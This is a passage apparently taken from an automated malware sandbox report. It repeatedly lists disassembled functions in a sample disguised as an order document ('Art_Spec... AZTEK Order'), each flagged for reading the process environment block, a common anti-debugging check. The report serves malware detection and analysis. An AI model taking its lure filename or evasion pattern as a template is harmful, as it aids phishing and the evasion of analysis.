            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE5CF mov eax, dword ptr fs:[00000030h]5_2_013EE5CF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA430 mov eax, dword ptr fs:[00000030h]5_2_013EA430
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A456 mov eax, dword ptr fs:[00000030h]5_2_0146A456
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC427 mov eax, dword ptr fs:[00000030h]5_2_013AC427
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C460 mov ecx, dword ptr fs:[00000030h]5_2_0143C460
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A645D mov eax, dword ptr fs:[00000030h]5_2_013A645D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D245A mov eax, dword ptr fs:[00000030h]5_2_013D245A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E44B0 mov ecx, dword ptr fs:[00000030h]5_2_013E44B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B64AB mov eax, dword ptr fs:[00000030h]5_2_013B64AB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A49A mov eax, dword ptr fs:[00000030h]5_2_0146A49A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B04E5 mov ecx, dword ptr fs:[00000030h]5_2_013B04E5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143A4B0 mov eax, dword ptr fs:[00000030h]5_2_0143A4B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov eax, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov ecx, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov eax, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01434755 mov eax, dword ptr fs:[00000030h]5_2_01434755
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC720 mov eax, dword ptr fs:[00000030h]5_2_013EC720
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC720 mov eax, dword ptr fs:[00000030h]5_2_013EC720
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E75D mov eax, dword ptr fs:[00000030h]5_2_0143E75D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0710 mov eax, dword ptr fs:[00000030h]5_2_013B0710
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E0710 mov eax, dword ptr fs:[00000030h]5_2_013E0710
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC700 mov eax, dword ptr fs:[00000030h]5_2_013EC700
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8770 mov eax, dword ptr fs:[00000030h]5_2_013B8770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0750 mov eax, dword ptr fs:[00000030h]5_2_013B0750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2750 mov eax, dword ptr fs:[00000030h]5_2_013F2750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2750 mov eax, dword ptr fs:[00000030h]5_2_013F2750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142C730 mov eax, dword ptr fs:[00000030h]5_2_0142C730
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov esi, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov eax, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov eax, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014307C3 mov eax, dword ptr fs:[00000030h]5_2_014307C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B07AF mov eax, dword ptr fs:[00000030h]5_2_013B07AF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E7E1 mov eax, dword ptr fs:[00000030h]5_2_0143E7E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B47FB mov eax, dword ptr fs:[00000030h]5_2_013B47FB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B47FB mov eax, dword ptr fs:[00000030h]5_2_013B47FB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145678E mov eax, dword ptr fs:[00000030h]5_2_0145678E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D27ED mov eax, dword ptr fs:[00000030h]5_2_013D27ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D27ED mov eax, dword ptr fs:[00000030h]5_2_013D27ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D27ED mov eax, dword ptr fs:[00000030h]5_2_013D27ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014647A0 mov eax, dword ptr fs:[00000030h]5_2_014647A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BC7C0 mov eax, dword ptr fs:[00000030h]5_2_013BC7C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B262C mov eax, dword ptr fs:[00000030h]5_2_013B262C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE627 mov eax, dword ptr fs:[00000030h]5_2_013CE627
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E6620 mov eax, dword ptr fs:[00000030h]5_2_013E6620
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8620 mov eax, dword ptr fs:[00000030h]5_2_013E8620
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2619 mov eax, dword ptr fs:[00000030h]5_2_013F2619
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147866E mov eax, dword ptr fs:[00000030h]5_2_0147866E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147866E mov eax, dword ptr fs:[00000030h]5_2_0147866E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C260B mov eax, dword ptr fs:[00000030h]5_2_013C260B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E2674 mov eax, dword ptr fs:[00000030h]5_2_013E2674
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E609 mov eax, dword ptr fs:[00000030h]5_2_0142E609
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA660 mov eax, dword ptr fs:[00000030h]5_2_013EA660
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA660 mov eax, dword ptr fs:[00000030h]5_2_013EA660
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CC640 mov eax, dword ptr fs:[00000030h]5_2_013CC640
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E66B0 mov eax, dword ptr fs:[00000030h]5_2_013E66B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC6A6 mov eax, dword ptr fs:[00000030h]5_2_013EC6A6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4690 mov eax, dword ptr fs:[00000030h]5_2_013B4690
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4690 mov eax, dword ptr fs:[00000030h]5_2_013B4690
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E6F2 mov eax, dword ptr fs:[00000030h]5_2_0142E6F2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E6F2 mov eax, dword ptr fs:[00000030h]5_2_0142E6F2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E6F2 mov eax, dword ptr fs:[00000030h]5_2_0142E6F2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E6F2 mov eax, dword ptr fs:[00000030h]5_2_0142E6F2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014306F1 mov eax, dword ptr fs:[00000030h]5_2_014306F1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014306F1 mov eax, dword ptr fs:[00000030h]5_2_014306F1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA6C7 mov ebx, dword ptr fs:[00000030h]5_2_013EA6C7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA6C7 mov eax, dword ptr fs:[00000030h]5_2_013EA6C7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430946 mov eax, dword ptr fs:[00000030h]5_2_01430946
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A8918 mov eax, dword ptr fs:[00000030h]5_2_013A8918
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A8918 mov eax, dword ptr fs:[00000030h]5_2_013A8918
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01454978 mov eax, dword ptr fs:[00000030h]5_2_01454978
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01454978 mov eax, dword ptr fs:[00000030h]5_2_01454978
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C97C mov eax, dword ptr fs:[00000030h]5_2_0143C97C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E908 mov eax, dword ptr fs:[00000030h]5_2_0142E908
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E908 mov eax, dword ptr fs:[00000030h]5_2_0142E908
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F096E mov eax, dword ptr fs:[00000030h]5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F096E mov edx, dword ptr fs:[00000030h]5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F096E mov eax, dword ptr fs:[00000030h]5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C912 mov eax, dword ptr fs:[00000030h]5_2_0143C912
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D6962 mov eax, dword ptr fs:[00000030h]5_2_013D6962
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D6962 mov eax, dword ptr fs:[00000030h]5_2_013D6962
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D6962 mov eax, dword ptr fs:[00000030h]5_2_013D6962
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143892A mov eax, dword ptr fs:[00000030h]5_2_0143892A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0144892B mov eax, dword ptr fs:[00000030h]5_2_0144892B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014469C0 mov eax, dword ptr fs:[00000030h]5_2_014469C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147A9D3 mov eax, dword ptr fs:[00000030h]5_2_0147A9D3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B09AD mov eax, dword ptr fs:[00000030h]5_2_013B09AD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B09AD mov eax, dword ptr fs:[00000030h]5_2_013B09AD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A0 mov eax, dword ptr fs:[00000030h]5_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E9E0 mov eax, dword ptr fs:[00000030h]5_2_0143E9E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E29F9 mov eax, dword ptr fs:[00000030h]5_2_013E29F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E29F9 mov eax, dword ptr fs:[00000030h]5_2_013E29F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA9D0 mov eax, dword ptr fs:[00000030h]5_2_013BA9D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E49D0 mov eax, dword ptr fs:[00000030h]5_2_013E49D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014389B3 mov esi, dword ptr fs:[00000030h]5_2_014389B3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014389B3 mov eax, dword ptr fs:[00000030h]5_2_014389B3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014389B3 mov eax, dword ptr fs:[00000030h]5_2_014389B3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov eax, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov eax, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov eax, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov ecx, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov eax, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2835 mov eax, dword ptr fs:[00000030h]5_2_013D2835
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA830 mov eax, dword ptr fs:[00000030h]5_2_013EA830
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E872 mov eax, dword ptr fs:[00000030h]5_2_0143E872
